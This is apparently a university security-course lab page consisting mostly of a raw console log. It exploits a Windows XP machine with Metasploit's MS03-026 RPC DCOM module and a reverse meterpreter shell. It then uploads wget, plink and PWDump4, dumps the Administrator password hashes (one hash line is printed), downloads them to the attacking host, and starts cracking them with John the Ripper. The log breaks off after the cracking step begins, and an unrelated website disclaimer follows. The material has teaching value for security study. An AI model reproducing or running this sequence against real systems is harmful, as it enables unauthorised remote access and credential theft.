UCCS
Exploit XPUP using Msfconsole of framework 2 with meterpreter
Here we run msfconsole on viva and testing an xpup machine.
First login viva and edit your .bash_profile to include the path to framework-2.7.
You can also use framework-3.0 if you are familiar with it. They have different ways to organize the exploits and payload. Framework-3.0 is more organized.
Here is the line of PATH in .bash_profile I modified.
PATH=$PATH:$HOME/bin:/opt/framework-2.7
[cs591@viva ~]$ msfconsole
Using Term::ReadLine::Stub, I suggest installing something better (ie Term::ReadLine::Gnu)
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
+ -- --=[ msfconsole v2.7 [158 exploits - 76 payloads]
msf > show exploits
Metasploit Framework Loaded Exploits
====================================
3com_3cdaemon_ftp_overflow 3Com 3CDaemon FTP Server Overflow
Credits Metasploit Framework Credits
afp_loginext AppleFileServer LoginExt PathName Overflow
aim_goaway AOL Instant Messenger goaway Overflow
altn_webadmin Alt-N WebAdmin USER Buffer Overflow
apache_chunked_win32 Apache Win32 Chunked Encoding
arkeia_agent_access Arkeia Backup Client Remote Access
arkeia_type77_macos Arkeia Backup Client Type 77 Overflow (Mac OS X)
arkeia_type77_win32 Arkeia Backup Client Type 77 Overflow (Win32)
awstats_configdir_exec AWStats configdir Remote Command Execution
backupexec_agent Veritas Backup Exec Windows Remote Agent Overflow
backupexec_dump Veritas Backup Exec Windows Remote File Access
backupexec_ns Veritas Backup Exec Name Service Overflow
backupexec_registry Veritas Backup Exec Server Registry Access
badblue_ext_overflow BadBlue 2.5 EXT.dll Buffer Overflow
bakbone_netvault_heap BakBone NetVault Remote Heap Overflow
barracuda_img_exec Barracuda IMG.PL Remote Command Execution
blackice_pam_icq ISS PAM.dll ICQ Parser Buffer Overflow
bluecoat_winproxy Blue Coat Systems WinProxy Host Header Buffer Overflow
bomberclone_overflow_win32 Bomberclone 0.11.6 Buffer Overflow
cabrightstor_disco CA BrightStor Discovery Service Overflow
cabrightstor_disco_servicepc CA BrightStor Discovery Service SERVICEPC Overflow
cabrightstor_sqlagent CA BrightStor Agent for Microsoft SQL Overflow
cabrightstor_uniagent CA BrightStor Universal Agent Overflow
cacam_logsecurity_win32 CA CAM log_security() Stack Overflow (Win32)
cacti_graphimage_exec Cacti graph_image.php Remote Command Execution
calicclnt_getconfig CA License Client GETCONFIG Overflow
calicserv_getconfig CA License Server GETCONFIG Overflow
cesarftp_mkd Cesar FTP 0.99g MKD Command Buffer Overflow
distcc_exec DistCC Daemon Command Execution
edirectory_imonitor eDirectory 8.7.3 iMonitor Remote Stack Overflow
edirectory_imonitor2 eDirectory 8.8 iMonitor Remote Stack Overflow
eiq_license EIQ License Manager Overflow
eudora_imap Qualcomm WorldMail IMAPD Server Buffer Overflow
exchange2000_xexch50 Exchange 2000 MS03-46 Heap Overflow
firefox_queryinterface_linux Firefox location.QueryInterface() Code Execution (Linux x86)
firefox_queryinterface_osx Firefox location.QueryInterface() Code Execution (Mac OS X)
freeftpd_key_exchange FreeFTPd 1.0.10 Key Exchange Algorithm Buffer Overflow
freeftpd_user freeFTPd USER Overflow
freesshd_key_exchange FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow
futuresoft_tftpd FutureSoft TFTP Server 2000 Buffer Overflow
globalscapeftp_user_input GlobalSCAPE Secure FTP Server user input overflow
gnu_mailutils_imap4d GNU Mailutils imap4d Format String Vulnerability
google_proxystylesheet_exec Google Appliance ProxyStyleSheet Command Execution
hpux_ftpd_preauth_list HP-UX FTP Server Preauthentication Directory Listing
hpux_lpd_exec HP-UX LPD Command Execution
ia_webmail IA WebMail 3.x Buffer Overflow
icecast_header Icecast (compareTo() Code Execution
ms05_030_nntp Microsoft Outlook Express NNTP Response Overflow
ms05_039_pnp Microsoft PnP MS05-039 Overflow
msasn1_ms04_007_killbill Microsoft ASN.1 Library Bitstring Heap Overflow
msmq_deleteobject_ms05_017 Microsoft Message Queueing Service MSO5-017
msrpc_dcom_ms03_026 Microsoft RPC DCOM MSO3-026
mssql2000_preauthentication MSSQL 2000/MSDE Hello Buffer Overflow
mssql2000_resolution MSSQL 2000/MSDE Resolution Overflow
netapi_ms06_040 Microsoft CanonicalizePathName() MSO6-040 Overflow
netterm_netftpd_user_overflow NetTerm NetFTPD USER Buffer Overflow
niprint_lpd NIPrint LPD Request Overflow
novell_messenger_acceptlang Novell Messenger Server 2.0 Accept-Language Overflow
openview_connectednodes_exec HP Openview connectedNodes.ovpl Remote Command Execution
openview_omniback HP OpenView Omniback II Command Execution
oracle9i_xdb_ftp Oracle 9i XDB FTP UNLOCK Overflow (win32)
oracle9i_xdb_ftp_pass Oracle 9i XDB FTP PASS Overflow (win32)
oracle9i_xdb_http Oracle 9i XDB HTTP PASS Overflow (win32)
pajax_remote_exec PAJAX Remote Command Execution
payload_handler Metasploit Framework Payload Handler
peercast_url_linux PeerCast 135
msf msrpc_dcom_ms03_026 > set LHOST 128.198.60.192
LHOST -> 128.198.60.192
msf msrpc_dcom_ms03_026 > set LPORT 4321
LPORT -> 4321
msf msrpc_dcom_ms03_026 > show payloads
Metasploit Framework Usable Payloads
====================================
win32_adduser Windows Execute net user /ADD
win32_bind Windows Bind Shell
win32_bind_dllinject Windows Bind DLL Inject
win32_bind_meterpreter Windows Bind Meterpreter DLL Inject
win32_bind_stg Windows Staged Bind Shell
win32_bind_stg_upexec Windows Staged Bind Upload/Execute
win32_bind_vncinject Windows Bind VNC Server DLL Inject
win32_downloadexec Windows Executable Download and Execute
win32_exec Windows Execute Command
win32_passivex Windows PassiveX ActiveX Injection Payload
win32_passivex_meterpreter Windows PassiveX ActiveX Inject Meterpreter Payload
win32_passivex_stg Windows Staged PassiveX Shell
win32_passivex_vncinject Windows PassiveX ActiveX Inject VNC Server Payload
win32_reverse Windows Reverse Shell
win32_reverse_dllinject Windows Reverse DLL Inject
win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject
win32_reverse_ord Windows Staged Reverse Ordinal Shell
win32_reverse_ord_vncinject Windows Reverse Ordinal VNC Server Inject
win32_reverse_stg Windows Staged Reverse Shell
win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
win32_reverse_vncinject Windows Reverse VNC Server Inject
msf msrpc_dcom_ms03_026 > set win32_reverse_meterpreter
win32_reverse_meterpreter:
msf msrpc_dcom_ms03_026 > set TARGET 2
TARGET -> 2
msf msrpc_dcom_ms03_026 > exploit
[*] This exploit requires a valid payload to be specified first.
msf msrpc_dcom_ms03_026 > set payload win32_reverse_meterpreter
payload -> win32_reverse_meterpreter
[*] WARNING: the correct case of the 'payload' variable is 'PAYLOAD'
msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > exploit
[*] Invalid target specified.
msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > set PAYLOAD win32_reverse_meterpreter
PAYLOAD -> win32_reverse_meterpreter
msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > exploit
[*] Invalid target specified.
msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > set TARGET 0
TARGET -> 0
msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > exploit
[*] Starting Reverse Handler.
[*] Sending request...
[*] Got connection from 128.198.60.192:4321 128.198.60.156:1027
[*] Sending Intermediate Stager (89 bytes)
[*] Sending Stage (2834 bytes)
[*] Sleeping before sending dll.
[*] Uploading dll to memory (69643), Please wait...
[*] Upload completed
meterpreter>
[ -= connected to =- ]
[ -= meterpreter server =- ]
[ -= v. 00000500 =- ]
meterpreter> ls
invalid command
meterpreter> help
Core Core feature set commands
------------ ----------------
read Reads from a communication channel
write Writes to a communication channel
close Closes a communication channel
interact Switch to interactive mode with a channel
help Displays the list of all register commands
exit Exits the client
initcrypt Initializes the cryptographic subsystem
Extensions Feature extension commands
------------ ----------------
loadlib Loads a library on the remote endpoint
use Uses a feature extension module
meterpreter> use -m Process
loadlib: Loading library from 'ext472627.dll' on the remote machine.
meterpreter>
loadlib: success.
meterpreter> help
Core Core feature set commands
------------ ----------------
read Reads from a communication channel
write Writes to a communication channel
close Closes a communication channel
interact Switch to interactive mode with a channel
help Displays the list of all register commands
exit Exits the client
initcrypt Initializes the cryptographic subsystem
Extensions Feature extension commands
------------ ----------------
loadlib Loads a library on the remote endpoint
use Uses a feature extension module
Process Process manipulation and execution commands
------------ ----------------
execute Executes a process on the remote endpoint
kill Terminate one or more processes on the remote endpoint
ps List processes on the remote endpoint
meterpreter> use -m Fs
loadlib: Loading library from 'ext500104.dll' on the remote machine.
meterpreter>
loadlib: success.
meterpreter> help
Core Core feature set commands
------------ ----------------
read Reads from a communication channel
write Writes to a communication channel
close Closes a communication channel
interact Switch to interactive mode with a channel
help Displays the list of all register commands
exit Exits the client
initcrypt Initializes the cryptographic subsystem
Extensions Feature extension commands
------------ ----------------
loadlib Loads a library on the remote endpoint
use Uses a feature extension module
Process Process manipulation and execution commands
------------ ----------------
execute Executes a process on the remote endpoint
kill Terminate one or more processes on the remote endpoint
ps List processes on the remote endpoint
File System File system interaction and manipulation commands
------------ ----------------
cd Change working directory.
getcwd Get the current working directory.
ls List the contents of a directory.
upload Upload one or more files to a remote directory.
download Download one or more files from a remote directory.
meterpreter> upload wget.exe
Usage: upload src1 [src2 ...] dst
meterpreter> upload wget.exe c:\
upload: Starting upload of 'wget.exe' to 'c:\\wget.exe'...
upload: 1 uploads started.
meterpreter>
upload: Upload from 'wget.exe' succeeded.
meterpreter> upload plink.exe
Usage: upload src1 [src2 ...] dst
meterpreter> upload plink.exe c:\
upload: Starting upload of 'plink.exe' to 'c:\\plink.exe'...
upload: 1 uploads started.
meterpreter>
upload: Upload from 'plink.exe' succeeded.
meterpreter> execute -f wget.exe -a
execute: Executing 'wget.exe'...
meterpreter>
execute: failure, 2.
meterpreter> help
Core Core feature set commands
------------ ----------------
read Reads from a communication channel
write Writes to a communication channel
close Closes a communication channel
interact Switch to interactive mode with a channel
help Displays the list of all register commands
exit Exits the client
initcrypt Initializes the cryptographic subsystem
Extensions Feature extension commands
------------ ----------------
loadlib Loads a library on the remote endpoint
use Uses a feature extension module
Process Process manipulation and execution commands
------------ ----------------
execute Executes a process on the remote endpoint
kill Terminate one or more processes on the remote endpoint
ps List processes on the remote endpoint
File System File system interaction and manipulation commands
------------ ----------------
cd Change working directory.
getcwd Get the current working directory.
ls List the contents of a directory.
upload Upload one or more files to a remote directory.
download Download one or more files from a remote directory.
meterpreter> execute -f c:\wget.exe -a
execute: Executing 'c:\wget.exe'...
meterpreter>
execute: success, process id is 188.
meterpreter> execute -f c:\wget.exe -a
execute: Executing 'c:\wget.exe'...
meterpreter>
execute: success, process id is 224.
meterpreter> execute -f c:\tftpd32.exe
execute: Executing 'c:\tftpd32.exe'...
meterpreter>
execute: failure, 2.
meterpreter> execute -f cmd -c
execute: Executing 'cmd'...
meterpreter>
execute: success, process id is 2020.
execute: allocated channel 3 for new process.
meterpreter> interact 3
interact: Switching to interactive console on 3...
meterpreter>
interact: Started interactive channel 3.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>cd ..
cd ..
C:\WINDOWS>cd ..
cd ..
C:\>ls
ls
'ls' is not recognized as an internal or external command,
operable program or batch file.
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is ECC2-88FC
Directory of C:\
07/27/2004 09:21 PM 0 AUTOEXEC.BAT
07/27/2004 09:21 PM 0 CONFIG.SYS
07/27/2004 09:54 PM cs301
01/07/2007 12:23 AM Documents and Settings
03/05/2007 10:59 PM 229,376 plink.exe
01/07/2007 12:20 AM Program Files
03/05/2007 10:58 PM 308,736 wget.exe
01/06/2007 11:27 PM WINDOWS
4 File(s) 538,112 bytes
4 Dir(s) 15,457,402,880 bytes free
C:\>plink.exe -ssh cs591@viva.uccs.edu
plink.exe -ssh cs591@viva.uccs.edu
The server's host key is not cached in the registry. You
have no guarantee that the server is the computer you
think it is.
The server's key fingerprint is:
ssh-rsa 2048 a8:e4:d7:d4:e7:61:dd:02:26:e6:c1:b5:f9:12:2b:83
If you trust this host, enter "y" to add the key to
PuTTY's cache and carry on connecting.
If you want to carry on connecting just once, without
adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the
connection.
Store key in cache? (y/n) y
cs591@viva.uccs.edu's password: XXXXXX
cs591@viva.uccs.edu's password: XXXXXX
cs591@viva.uccs.edu's password: Caught interrupt, close interactive session? [y/N] y
meterpreter> execute -f cmd -c
execute: Executing 'cmd'...
meterpreter>
execute: success, process id is 356.
execute: allocated channel 4 for new process.
meterpreter> interact 4
interact: Switching to interactive console on 4...
meterpreter>
interact: Started interactive channel 4.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>cd ..
cd ..
C:\WINDOWS>cd ..
cd ..
C:\>ls
ls
'ls' is not recognized as an internal or external command,
operable program or batch file.
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is ECC2-88FC
Directory of C:\
07/27/2004 09:21 PM 0 AUTOEXEC.BAT
07/27/2004 09:21 PM 0 CONFIG.SYS
07/27/2004 09:54 PM cs301
01/07/2007 12:23 AM Documents and Settings
03/05/2007 10:59 PM 229,376 plink.exe
01/07/2007 12:20 AM Program Files
03/05/2007 10:58 PM 308,736 wget.exe
03/05/2007 11:09 PM WINDOWS
4 File(s) 538,112 bytes
4 Dir(s) 15,457,370,112 bytes free
C:\>plink -l cs591 -pw XXXXXX viva.uccs.edu
plink -l cs591 -pw XXXXX viva.uccs.edu
Last login: Wed May 9 00:15:10 2007 from c-75-70-32-124.hsd1.
[cs591@viva ~]$ ls
ls
bin CS591S2007Grade.txt out vmware
bufferOverflow Desktop public_html
cs591ClientFromViva.p12 framework-2.7-snapshot.tar.gz secure
[cs591@viva ~]$ exit
exit
logout
Using username "cs591".
C:\>plink -ssh cs591@viva.ucs.edu scp
plink -ssh cs591@viva.ucs.edu scp
Unable to open connection:
Host does not exist
C:\>
meterpreter> upload ../passwd-attack/PWDump4.exe c:\
upload: Starting upload of '../passwd-attack/PWDump4.exe' to 'c:\\PWDump4.exe'...
upload: 1 uploads started.
meterpreter>
upload: Upload from '../passwd-attack/PWDump4.exe' succeeded.
meterpreter> upload ../passwd-attack/PWDupm4.dll c:\
upload: Starting upload of '../passwd-attack/PWDupm4.dll' to 'c:\\PWDupm4.dll'...
upload: 1 uploads started.
meterpreter>
Error: Local file '../passwd-attack/PWDupm4.dll' could not be opened for reading.
meterpreter> upload ../passwd-attack/PWDump4.dll c:\
upload: Starting upload of '../passwd-attack/PWDump4.dll' to 'c:\\PWDump4.dll'...
upload: 1 uploads started.
meterpreter>
upload: Upload from '../passwd-attack/PWDump4.dll' succeeded.
meterpreter> help
Core Core feature set commands
------------ ----------------
read Reads from a communication channel
write Writes to a communication channel
close Closes a communication channel
interact Switch to interactive mode with a channel
help Displays the list of all register commands
exit Exits the client
initcrypt Initializes the cryptographic subsystem
Extensions Feature extension commands
------------ ----------------
loadlib Loads a library on the remote endpoint
use Uses a feature extension module
Process Process manipulation and execution commands
------------ ----------------
execute Executes a process on the remote endpoint
kill Terminate one or more processes on the remote endpoint
ps List processes on the remote endpoint
File System File system interaction and manipulation commands
------------ ----------------
cd Change working directory.
getcwd Get the current working directory.
ls List the contents of a directory.
upload Upload one or more files to a remote directory.
download Download one or more files from a remote directory.
meterpreter> upload ../passwd-attack/PWDump4.exe c:\
upload: Starting upload of '../passwd-attack/PWDump4.exe' to 'c:\\PWDump4.exe'...
upload: 1 uploads started.
meterpreter>
upload: Upload from '../passwd-attack/PWDump4.exe' succeeded.
meterpreter> upload ../passwd-attack/PWDupm4.dll c:\
upload: Starting upload of '../passwd-attack/PWDupm4.dll' to 'c:\\PWDupm4.dll'...
upload: 1 uploads started.
meterpreter>
Error: Local file '../passwd-attack/PWDupm4.dll' could not be opened for reading.
meterpreter> upload ../passwd-attack/PWDump4.dll c:\
upload: Starting upload of '../passwd-attack/PWDump4.dll' to 'c:\\PWDump4.dll'...
upload: 1 uploads started.
meterpreter>
upload: Upload from '../passwd-attack/PWDump4.dll' succeeded.
meterpreter> execute -f cmd -c
execute: Executing 'cmd'...
meterpreter>
meterpreter> execute -f cmd -c
execute: Executing 'cmd'...
meterpreter>
meterpreter>
meterpreter> show
invalid command
meterpreter> help
Core Core feature set commands
------------ ----------------
read Reads from a communication channel
write Writes to a communication channel
close Closes a communication channel
interact Switch to interactive mode with a channel
help Displays the list of all register commands
exit Exits the client
initcrypt Initializes the cryptographic subsystem
Extensions Feature extension commands
------------ ----------------
loadlib Loads a library on the remote endpoint
use Uses a feature extension module
Process Process manipulation and execution commands
------------ ----------------
execute Executes a process on the remote endpoint
kill Terminate one or more processes on the remote endpoint
ps List processes on the remote endpoint
File System File system interaction and manipulation commands
------------ ----------------
cd Change working directory.
getcwd Get the current working directory.
ls List the contents of a directory.
upload Upload one or more files to a remote directory.
download Download one or more files from a remote directory.
meterpreter> execute -f cmd -c
execute: Executing 'cmd'...
meterpreter>
meterpreter> exit
exit
The meterpreter is shutting down...
[*] Meterpreter client finished.
[*] Exiting Reverse Handler.
msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > exploit
[*] Starting Reverse Handler.
[*] Sending request...
[*] Exiting Reverse Handler.
msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > exploit
[*] Starting Reverse Handler.
[*] Sending request...
[*] Exiting Reverse Handler.
msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > exploit
[*] Starting Reverse Handler.
[*] Sending request...
[*] Exiting Reverse Handler.
msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > quit
[cs591@viva tools]$ msfconsole
Using Term::ReadLine::Stub, I suggest installing something better (ie Term::ReadLine::Gnu)
_ _ _ _
| | | | (_) |
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
| |
|_|
+ -- --=[ msfconsole v2.7 [158 exploits - 76 payloads]
msf > set msrpc_dcom_ms03_026
msfconsole: set: command not found
msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026 > set RHOST 128.198.60.156
RHOST -> 128.198.60.156
msf msrpc_dcom_ms03_026 > set RPORT 135
RPORT -> 135
msf msrpc_dcom_ms03_026 > set LHOST 128.198.60.192
LHOST -> 128.198.60.192
msf msrpc_dcom_ms03_026 > set LPORT 4321
LPORT -> 4321
msf msrpc_dcom_ms03_026 > set win32_reverse_meterpreter
win32_reverse_meterpreter:
msf msrpc_dcom_ms03_026 > set PAYLOAD win32_reverse_meterpreter
PAYLOAD -> win32_reverse_meterpreter
msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > set TARGET 0
TARGET -> 0
msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > exploit
[*] Starting Reverse Handler.
[*] Sending request...
[*] Got connection from 128.198.60.192:4321 128.198.60.156:1027
[*] Sending Intermediate Stager (89 bytes)
[*] Sending Stage (2834 bytes)
[*] Sleeping before sending dll.
[*] Uploading dll to memory (69643), Please wait...
[*] Upload completed
meterpreter>
[ -= connected to =- ]
[ -= meterpreter server =- ]
[ -= v. 00000500 =- ]
meterpreter> help
Core Core feature set commands
------------ ----------------
read Reads from a communication channel
write Writes to a communication channel
close Closes a communication channel
interact Switch to interactive mode with a channel
help Displays the list of all register commands
exit Exits the client
initcrypt Initializes the cryptographic subsystem
Extensions Feature extension commands
------------ ----------------
loadlib Loads a library on the remote endpoint
use Uses a feature extension module
meterpreter> use -m Process
loadlib: Loading library from 'ext285386.dll' on the remote machine.
meterpreter>
loadlib: success.
meterpreter> use -m Fs
loadlib: Loading library from 'ext821455.dll' on the remote machine.
meterpreter>
loadlib: success.
meterpreter> help
Core Core feature set commands
------------ ----------------
read Reads from a communication channel
write Writes to a communication channel
close Closes a communication channel
interact Switch to interactive mode with a channel
help Displays the list of all register commands
exit Exits the client
initcrypt Initializes the cryptographic subsystem
Extensions Feature extension commands
------------ ----------------
loadlib Loads a library on the remote endpoint
use Uses a feature extension module
Process Process manipulation and execution commands
------------ ----------------
execute Executes a process on the remote endpoint
kill Terminate one or more processes on the remote endpoint
ps List processes on the remote endpoint
File System File system interaction and manipulation commands
------------ ----------------
cd Change working directory.
getcwd Get the current working directory.
ls List the contents of a directory.
upload Upload one or more files to a remote directory.
download Download one or more files from a remote directory.
meterpreter> execute -f cmd -c
execute: Executing 'cmd'...
meterpreter>
execute: success, process id is 320.
execute: allocated channel 1 for new process.
meterpreter> interact 1
interact: Switching to interactive console on 1...
meterpreter>
interact: Started interactive channel 1.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>cd ..
cd ..
C:\WINDOWS>cd ..
cd ..
C:\>ls
ls
'ls' is not recognized as an internal or external command,
operable program or batch file.
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is ECC2-88FC
Directory of C:\
07/27/2004 09:21 PM 0 AUTOEXEC.BAT
07/27/2004 09:21 PM 0 CONFIG.SYS
07/27/2004 09:54 PM cs301
01/07/2007 12:23 AM Documents and Settings
03/05/2007 10:59 PM 229,376 plink.exe
01/07/2007 12:20 AM Program Files
03/05/2007 11:20 PM 4,608 PWDump4.dll
03/05/2007 11:19 PM 16,384 PWDump4.exe
03/05/2007 11:20 PM 0 PWDupm4.dll
03/05/2007 10:58 PM 308,736 wget.exe
03/05/2007 11:09 PM WINDOWS
7 File(s) 559,104 bytes
4 Dir(s) 15,457,337,344 bytes free
C:\>delete PWDupm4.dll
delete PWDupm4.dll
'delete' is not recognized as an internal or external command,
operable program or batch file.
C:\>del PWDupm4.dll
del PWDupm4.dll
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is ECC2-88FC
Directory of C:\
07/27/2004 09:21 PM 0 AUTOEXEC.BAT
07/27/2004 09:21 PM 0 CONFIG.SYS
07/27/2004 09:54 PM cs301
01/07/2007 12:23 AM Documents and Settings
03/05/2007 10:59 PM 229,376 plink.exe
01/07/2007 12:20 AM Program Files
03/05/2007 11:20 PM 4,608 PWDump4.dll
03/05/2007 11:19 PM 16,384 PWDump4.exe
03/05/2007 10:58 PM 308,736 wget.exe
03/05/2007 11:09 PM WINDOWS
6 File(s) 559,104 bytes
4 Dir(s) 15,457,337,344 bytes free
C:\>PWDump4
PWDump4
PWDUMP4.02 dump winnt/2000 user/password hash remote or local for crack.
by bingle@.cn
This program is free software based on pwpump3 by Phil Staubs
under the GNU General Public License Version 2.
Usage: PWDUMP4 [Target | /l] [/s:share] [/o:outputFile] [/u:userName]
[Target] -- Target Computer's ip or name to work,
[/l] -- works on local Computer.
[/s:share] -- Share used to copy files instead of Admin$.
[/o:outputFile] -- Result filename for output.
[/u:userName] -- UserName used to connect, provide password later.
[/r[:newname]] -- Rename the files to 'newname' when copy to the target, rename service name also, see FAQ for more.
C:\>PWDump4 /l /o:passwd.txt
PWDump4 /l /o:passwd.txt
PWDUMP4.02 dump winnt/2000 user/password hash remote or local for crack.
by bingle@.cn
This program is free software based on pwpump3 by Phil Staubs
under the GNU General Public License Version 2.
SRV>Version: OS Ver 5.1, , Workstation
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is ECC2-88FC
Directory of C:\
07/27/2004 09:21 PM 0 AUTOEXEC.BAT
07/27/2004 09:21 PM 0 CONFIG.SYS
07/27/2004 09:54 PM cs301
01/07/2007 12:23 AM Documents and Settings
03/05/2007 11:34 PM 88 passwd.txt
03/05/2007 10:59 PM 229,376 plink.exe
01/07/2007 12:20 AM Program Files
03/05/2007 11:20 PM 4,608 PWDump4.dll
03/05/2007 11:19 PM 16,384 PWDump4.exe
03/05/2007 10:58 PM 308,736 wget.exe
03/05/2007 11:09 PM WINDOWS
7 File(s) 559,192 bytes
4 Dir(s) 15,457,329,152 bytes free
C:\>vi passwd.txt
vi passwd.txt
'vi' is not recognized as an internal or external command,
operable program or batch file.
C:\>cat passwd.txt
cat passwd.txt
'cat' is not recognized as an internal or external command,
operable program or batch file.
C:\>more passwd.txt
more passwd.txt
Administrator:500:626309417146BFFDAAD3B435B51404EE:C136578936200A5DDAB03847745758F7:::
C:\>PWDump4
PWDump4
PWDUMP4.02 dump winnt/2000 user/password hash remote or local for crack.
by bingle@.cn
This program is free software based on pwpump3 by Phil Staubs
under the GNU General Public License Version 2.
Usage: PWDUMP4 [Target | /l] [/s:share] [/o:outputFile] [/u:userName]
[Target] -- Target Computer's ip or name to work,
[/l] -- works on local Computer.
[/s:share] -- Share used to copy files instead of Admin$.
[/o:outputFile] -- Result filename for output.
[/u:userName] -- UserName used to connect, provide password later.
[/r[:newname]] -- Rename the files to 'newname' when copy to the target, rename service name also, see FAQ for more.
C:\>PWDump4 /l /o:pw.txt
PWDump4 /l /o:pw.txt
PWDUMP4.02 dump winnt/2000 user/password hash remote or local for crack.
by bingle@.cn
This program is free software based on pwpump3 by Phil Staubs
under the GNU General Public License Version 2.
SRV>Version: OS Ver 5.1, , Workstation
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is ECC2-88FC
Directory of C:\
07/27/2004 09:21 PM 0 AUTOEXEC.BAT
07/27/2004 09:21 PM 0 CONFIG.SYS
07/27/2004 09:54 PM cs301
01/07/2007 12:23 AM Documents and Settings
03/05/2007 11:34 PM 88 passwd.txt
03/05/2007 10:59 PM 229,376 plink.exe
01/07/2007 12:20 AM Program Files
03/05/2007 11:42 PM 169 pw.txt
03/05/2007 11:20 PM 4,608 PWDump4.dll
03/05/2007 11:19 PM 16,384 PWDump4.exe
03/05/2007 10:58 PM 308,736 wget.exe
03/05/2007 11:09 PM WINDOWS
8 File(s) 559,361 bytes
4 Dir(s) 15,456,821,248 bytes free
C:\>
C:\>exit
exit
interact: Ending interactive session.
meterpreter> download c:\pw.txt /pentest
download: Starting download from 'c:\pw.txt' to '/pentest/pw.txt'...
download: 1 downloads started.
meterpreter>
download: Download to '/pentest/pw.txt' succeeded.
meterpreter> download c:\passwd.txt /pentest
download: Starting download from 'c:\passwd.txt' to '/pentest/passwd.txt'...
download: 1 downloads started.
meterpreter>
download: Download to '/pentest/passwd.txt' succeeded.
meterpreter> quit
[cs591@viva pentest]$ password/john-1.7.2/run/john pw.txt
password/john-1.7.2/run/john: error while loading shared libraries: libcrypto.so.0: cannot open shared object file: No such file or directory
[cs591@viva pentest]$ john pw.txt
Loaded 2 passwords with no different salts (NT LM DES [24/32 4K])
................
................
In order to avoid copyright disputes, this page is only a partial summary.
To fulfill the demand for quickly locating and searching documents.
It is intelligent file search solution for home and business.